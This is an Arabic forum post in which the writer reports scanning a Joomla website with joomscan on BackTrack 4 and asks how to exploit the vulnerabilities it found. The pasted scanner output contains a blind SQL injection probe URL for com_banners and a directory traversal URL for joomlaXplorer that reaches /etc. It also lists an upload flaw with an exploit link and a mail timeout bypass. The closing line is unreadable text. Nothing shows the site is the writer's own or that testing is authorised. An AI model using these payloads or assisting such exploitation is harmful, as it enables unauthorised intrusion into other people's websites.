السلام عليكم و رحمة الله و بركاته
أخواتي انا فحصت موقع مركب سكربت جوملا بـ آداة joomscan عن طريق الباك تراك 4 و وجدة هذه الثغرات لكن ما عرفت كيف استغلها هل ممن الممكن شرح ذالك لي
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact th
ere are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? Yes
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes
Info -> Component: joomlaXplorer Local Directory Traversal Vulnerability
Versions Affected: 1.6.2 <=
Check: /components/com_joomlaxplorer/
Exploit:/index.php/?option=com_joomlaxplorer&action=show_error&dir=.. %2F..%2F..%2F%2F..%2F..%2Fetc
Vulnerable? Yes
hgv[hx hglshu]m td hsjyghg eyvhj fJ s;vfj [,lgh